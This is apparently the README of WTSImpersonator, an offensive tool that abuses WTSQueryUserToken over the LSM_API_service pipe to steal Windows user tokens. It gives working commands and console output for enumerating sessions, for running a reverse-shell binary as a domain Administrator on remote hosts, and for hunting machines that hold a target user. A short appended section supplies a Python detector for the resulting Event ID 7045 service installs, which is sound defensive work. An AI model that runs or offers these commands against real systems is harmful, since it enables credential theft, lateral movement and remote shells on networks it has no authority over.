
WTSImpersonator utilizes WTSQueryUserToken to steal user tokens by abusing the RPC Named Pipe "\\pipe\LSM_API_service"






WTSImpersonator utilizes WTSQueryUserToken to steal other users tokens (Local/Remote) without using NtOpenProcess or touching Lsass.exe by abusing RPC Named Pipe "\pipe\LSM_API_service" (Admin Privileges Required)



enum Module:

Enumerate Local Users on the machine the tool is running from

.\WTSImpersonator.exe -m enum

Enumerate a machine remotely, given an IP or a hostname.

.\WTSImpersonator.exe -m enum -s  

exec / exec-remote Module:

Both "exec" and "exec-remote" require running in a "Service" context.
The local "exec" module needs nothing but WTSImpersonator.exe and the binary you want to execute (-c flag). This can be
a normal "C:\Windows\System32\cmd.exe", which opens a CMD as the user you desire. An example would be:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe  

You can use PsExec64.exe to obtain a service context:

.\PsExec64.exe -accepteula -s cmd.exe

For exec-remote things are a bit different: I created a service that can be installed remotely, just like PsExec.exe.
The service receives a SessionId and a binary to run as arguments, and it is installed and executed remotely given the right permissions.
An example run looks as follows:

PS C:\Users\Jon\Desktop> .\WTSImpersonator.exe -m enum -s

 __          _________ _____ _____                                                 _
 \ \        / /__   __/ ____|_   _|                                               | |
  \ \  /\  / /   | | | (___   | |  _ __ ___  _ __   ___ _ __ ___  ___  _ __   __ _| |_ ___  _ __
   \ \/  \/ /    | |  \___ \  | | | '_ ` _ \| '_ \ / _ \ '__/ __|/ _ \| '_ \ / _` | __/ _ \| '__|
    \  /\  /     | |  ____) |_| |_| | | | | | |_) |  __/ |  \__ \ (_) | | | | (_| | || (_) | |
     \/  \/      |_| |_____/|_____|_| |_| |_| .__/ \___|_|  |___/\___/|_| |_|\__,_|\__\___/|_|
                                            | |
         By: Omri Baso
WTSEnumerateSessions count: 1
[2] SessionId: 2 State: WTSDisconnected (4) WinstationName: ''
        WTSUserName:  Administrator
        WTSDomainName: LABS
        WTSConnectState: 4 (WTSDisconnected)

As can be seen above, the SessionId of the Administrator account is 2, so we pass it to the -id flag when executing code remotely:

PS C:\Users\Jon\Desktop> .\WTSImpersonator.exe -m exec-remote -s -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

user-hunter Module:

The user-hunter module gives you the ability to enumerate multiple machines and, if a given user is found, execute code on that user's behalf.
This is useful when hunting for "Domain Admins" while having local administrator rights on a few machines.

PS C:\Users\Jon\Desktop> .\WTSImpersonator.exe -m user-hunter -uh LABS/Administrator -ipl .\test.txt -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe

 __          _________ _____ _____                                                 _
 \ \        / /__   __/ ____|_   _|                                               | |
  \ \  /\  / /   | | | (___   | |  _ __ ___  _ __   ___ _ __ ___  ___  _ __   __ _| |_ ___  _ __
   \ \/  \/ /    | |  \___ \  | | | '_ ` _ \| '_ \ / _ \ '__/ __|/ _ \| '_ \ / _` | __/ _ \| '__|
    \  /\  /     | |  ____) |_| |_| | | | | | |_) |  __/ |  \__ \ (_) | | | | (_| | || (_) | |
     \/  \/      |_| |_____/|_____|_| |_| |_| .__/ \___|_|  |___/\___/|_| |_|\__,_|\__\___/|_|
                                            | |
         By: Omri Baso

[+] Hunting for: LABS/Administrator On list: .\test.txt
[-] Trying:
[+] Opned WTS Handle:
[-] Trying:
[+] Opned WTS Handle:

[+] Found User: LABS/Administrator On Server:
[+] Getting Code Execution as: LABS/Administrator
[+] Trying to execute remotly
[+] Transfering file remotely from: .\WTSService.exe To: \\\admin$\voli.exe
[+] Transfering file remotely from: .\SimpleReverseShellExample.exe To: \\\admin$\DrkSIM.exe
[+] Successfully transfered file!
[+] Successfully transfered file!
[+] Sucessfully Transferred Both Files
[+] Will Create Service voli
[+] Create Service Success : "C:\Windows\voli.exe" 2 C:\Windows\DrkSIM.exe
[+] OpenService Success!
[+] Started Sevice Sucessfully!

[+] Deleted Service
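Defender-side check for the remote install pattern shown by exec-remote and user-hunter above: a binary copied into the Windows directory root through admin$, then a service created with "<exe>" <SessionId> <payload> as its image path. This is an added example, not part of WTSImpersonator; the Event ID 7045 ("A service was installed in the system") messages are constructed and flattened to one line each.

```python
import re

# Constructed sample of Windows System log, Event ID 7045 messages, one per line.
# Not real captures; the first mirrors the "Create Service Success" line above.
SAMPLE_7045 = [
    'Service Name: voli Service File Name: "C:\\Windows\\voli.exe" 2 C:\\Windows\\DrkSIM.exe '
    'Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem',
    'Service Name: PSEXESVC Service File Name: %SystemRoot%\\PSEXESVC.exe '
    'Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem',
    'Service Name: WSearch Service File Name: C:\\Windows\\system32\\SearchIndexer.exe /Embedding '
    'Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem',
]

FIELDS_RE = re.compile(r"Service Name: (?P<name>.+?) Service File Name: (?P<image>.+?) Service Type:")
# Executable sitting directly in the Windows directory root: what a copy to \\host\admin$ produces.
ADMIN_SHARE_ROOT_RE = re.compile(r'^"?(?:[a-z]:\\windows|%systemroot%)\\[^\\"\s]+\.exe"?(?P<args>.*)$', re.I)
# Argument shape used by the WTSService installer: "<SessionId> <path-to-exe>".
SESSION_ARGS_RE = re.compile(r"^\s*(?P<sid>\d+)\s+(?P<payload>\S+\.exe)\s*$", re.I)


def analyze_7045(message):
    """Return a finding dict for a suspicious service install, or None."""
    m = FIELDS_RE.search(message)
    if not m:
        return None
    image = m.group("image").strip()
    root = ADMIN_SHARE_ROOT_RE.match(image)
    if not root:
        return None  # installs into a subdirectory (e.g. system32) are out of scope here
    reasons = ["binary dropped in Windows directory root (admin$ share)"]
    finding = {"service": m.group("name"), "image": image, "reasons": reasons}
    args = SESSION_ARGS_RE.match(root.group("args"))
    if args:
        finding["session_id"] = int(args.group("sid"))
        finding["payload"] = args.group("payload")
        reasons.append("arguments look like '<SessionId> <exe>' (WTSService pattern)")
    return finding


def scan_7045(messages):
    """All findings; those carrying a session_id are the high-confidence hits."""
    return [f for f in (analyze_7045(msg) for msg in messages) if f]


if __name__ == "__main__":
    for finding in scan_7045(SAMPLE_7045):
        print(finding)
```

The PsExec entry is reported with one reason only, which matches the README's own use of PsExec64.exe as a legitimate way to obtain a service context; the two-reason hit is the one worth alerting on.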


Research / Coding: Omri Baso

Graphics Logo: Kim Dvash








